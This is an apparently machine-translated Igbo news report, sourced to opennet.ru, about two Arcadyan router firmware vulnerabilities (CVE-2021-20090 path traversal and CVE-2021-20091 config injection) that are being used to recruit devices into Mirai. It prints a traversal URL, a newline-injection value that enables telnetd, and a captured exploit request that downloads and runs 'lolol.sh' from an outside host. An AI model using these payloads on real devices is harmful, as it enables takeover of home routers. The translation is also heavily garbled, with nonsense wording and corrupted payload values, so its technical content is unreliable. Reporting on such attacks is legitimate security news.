Edekọla nnukwu mwakpo na netwọk megide ndị na-anya ụgbọ ala nke firmware na-eji mmejuputa sava HTTP sitere na ụlọ ọrụ Arcadyan. Iji nweta njikwa ngwaọrụ, a na-eji ngwakọta nke adịghị ike abụọ na-enye ohere igbu koodu aka ike na ikike mgbọrọgwụ. Nsogbu a na-emetụta ọtụtụ ndị na-anya ADSL site na Arcadyan, ASUS na Buffalo, yana ngwaọrụ ndị enyere n'okpuru ụdị Beeline (a na-akwado nsogbu ahụ na Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone na ndị ọrụ telecom ndị ọzọ. A na-achọpụta na nsogbu ahụ dị na Arcadyan firmware maka ihe karịrị afọ 10 ma n'oge a jisiri ike ịkwaga ma ọ dịkarịa ala ụdị ngwaọrụ 20 sitere na ndị nrụpụta 17 dị iche iche.
Ihe ọghọm nke mbụ, CVE-2021-20090, na-eme ka o kwe omume ịnweta ederede interface ọ bụla na-enweghị nkwenye. Isi ihe adịghị ike bụ na n'ime webụsaịtị, a na-enweta ụfọdụ akwụkwọ ndekọ aha site na izipu onyonyo, faịlụ CSS na script Javascript na-enweghị nyocha. N'okwu a, a na-enyocha akwụkwọ ndekọ aha maka ịnweta na-enweghị nkwenye site na iji nkpuchi mbụ. Firmware gbochiri ịkọwapụta mkpụrụedemede “../” n'ụzọ iji gaa na ndekọ ndị nne na nna, mana iji nchikota “..% 2f” na-amafe ya. Ya mere, ọ ga-ekwe omume imepe ibe echedoro mgbe ị na-eziga arịrịọ dịka "http://192.168.1.1/images/..%2findex.htm".
Ọdịmma nke abụọ, CVE-2021-20091, na-enye onye ọrụ nwere ikike ime mgbanwe na ntọala sistemụ nke ngwaọrụ ahụ site na izipu paramita ahaziri ahazi na edemede apply_abstract.cgi, nke na-anaghị elele maka ọnụnọ nke mkpụrụedemede ọhụrụ na paramita. . Dịka ọmụmaatụ, mgbe ị na-arụ ọrụ ping, onye na-awakpo nwere ike ịkọwa uru "192.168.1.2%0AARC_SYS_TelnetdEnable=1" n'ọhịa na adreesị IP na-enyocha, na edemede, mgbe ịmepụta faịlụ ntọala /tmp/etc/config/ .glbcfg, ga-ede ahịrị "AARC_SYS_TelnetdEnable=1" n'ime ya ", nke na-eme ka ihe nkesa telnetd rụọ ọrụ, nke na-enye ohere ịnweta shei na-enweghị njedebe na ikike mgbọrọgwụ. N'otu aka ahụ, site na ịtọ ntọala AARC_SYS, ị nwere ike mebie koodu ọ bụla na sistemụ. Ihe ọghọm nke mbụ na-eme ka o kwe omume ịme edemede nsogbu na-enweghị nkwenye site na ịnweta ya dị ka "/images/..%2fapply_abstract.cgi".
Iji jiri adịghị ike eme ihe, onye na-awakpo ga-enwe ike izipu arịrịọ na ọdụ ụgbọ mmiri nke ihe ntanetị weebụ na-agba ọsọ. N'ikpe ikpe site na mgbanwe nke mgbasa mgbasa nke mbuso agha, ọtụtụ ndị na-arụ ọrụ na-ahapụ ohere na ngwaọrụ ha site na netwọk mpụga iji mee ka nchọpụta nsogbu dị mfe site na ọrụ nkwado. Ọ bụrụ na ịnweta interface ahụ bụ naanị na netwọk dị n'ime, enwere ike ibuso ọgụ site na netwọk mpụga site na iji usoro "DNS rebinding". A na-eji ya arụ ọrụ nke ọma iji jikọọ ndị na-anya ụgbọ ala na Mirai botnet: POST /images/..% 2fapply_abstract.cgi HTTP/1.1 Njikọ: nso Onye ọrụ-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&dARC_212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
isi: opennet.ru